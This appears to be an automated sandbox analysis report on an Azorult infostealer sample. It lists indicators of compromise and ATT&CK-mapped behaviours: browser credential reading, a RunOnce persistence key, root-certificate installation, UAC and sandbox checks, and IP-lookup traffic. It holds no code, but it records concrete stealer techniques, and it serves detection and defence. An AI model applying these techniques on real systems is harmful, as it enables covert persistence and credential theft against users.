azorult | 2adfa76af59257635bc4f6e842e6df00c5819ff889fb7c615c50a6c414c77878

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
2520	setups.tmp
2520	setups.tmp
2520	setups.tmp
2520	setups.tmp
2520	setups.tmp
2520	setups.tmp
2520	setups.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7196	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral3/memory/4508-901-0x0000000007C70000-0x0000000007C91000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\n2ho4qxn1w1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\FW7L6REZUK\\multitimer.exe\" 1 3.1617447927.60684bf78b00c"	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
286	ipinfo.io
466	ipinfo.io
82	api.ipify.org
176	ip-api.com
289	ipinfo.io
607	api.2ip.ua
641	api.2ip.ua
146	ipinfo.io
193	api.ipify.org
426	api.ipify.org
594	ipinfo.io
599	ipinfo.io
609	api.2ip.ua
140	ipinfo.io
345	ip-api.com
580	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\unins0000.dat	Full Program Features.exe
File created	C:\Program Files\unins0000.dll	Full Program Features.exe
File created	C:\Program Files\unins.vbs	Full Program Features.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
2256	4632	WerFault.exe	155
7212	4632	WerFault.exe	155
7744	4632	WerFault.exe	155
6780	4688	WerFault.exe	141
8032	4632	WerFault.exe	155
8140	4632	WerFault.exe	155
3936	4632	WerFault.exe	155
7932	4632	WerFault.exe	155
7844	4632	WerFault.exe	155
6264	4632	WerFault.exe	155
3832	4632	WerFault.exe	155
7720	4632	WerFault.exe	155

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
6592	timeout.exe
5972	timeout.exe
648	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
3100	taskkill.exe
7540	taskkill.exe
9200	taskkill.exe
7244	taskkill.exe
4468	taskkill.exe
7040	taskkill.exe
7376	taskkill.exe
7204	taskkill.exe
7968	taskkill.exe
7080	taskkill.exe
6380	taskkill.exe
8024	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	7Reg3bIct.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000087b6008c2f5735b001d13820184fba2a7f1142ea53167602cc23a89958a71748ae186866b4d089bdb9841bd581d4935d4ca009a12e0a9916c6677f2ac57bddc0a3bbdbcd3c87fd270781d475f10945e19d8eb5df36389302aea0	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 85144ec07928d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000a98c490bc9dca10def293e6c829169b7397216990e7cf2819e5a6657a8cae2396a5625f1a620c5d9207ddf34cf33f0e216ac3464106e35aaf0a35ff2438f8b234e2879253e495d00fa2269aed4e2c30a20bf3c18add5ab4ade8dee15b47025eea3a3835a65770f0b22b908539abe2e77f54a0bb9e4d1c1c517b9535c7e8fad864968d389e8c93ec30be1264ca2e79cc5ddefbc9b2c830d9456c5fdeb610b8dcdb0157f2ffe617f74c8399b9d9c7da24ff64d942f310993f254522a6fca031e9c2e4c711b555ee6826c631d74d4a02064ec04f354fa8464dda200702227996eafb0ab34ce02e0174e41fed56dff70c34fd4b4094004157b5cb76f4eeb9eeb1953e9d348680807ce67aba92c01b60d1f360dfda1f576da5622f03fee85511b98e37f656329b9f2901334063755a997edb9087f614be7f42576661165bccd47141f86ffb47ba5c3972388b379c3b32ee2722eda3381888393705d83b0b345918e440743c6972f998f14ee52566aa1f2b23a50ae956841a8428a2536cf46cc17a605facfb5ac5d942387288261d29f0396431f9b121a62817974059e371d05d4020e8773ab81c3b7	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
5768	PING.EXE
7552	PING.EXE
8692	PING.EXE
804	PING.EXE
4184	PING.EXE

Script User-Agent 9 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	141	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	153	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	464	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	596	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	287	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	471	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	593	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	600	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	608	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2520	setups.tmp
2520	setups.tmp
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
4024	multitimer.exe
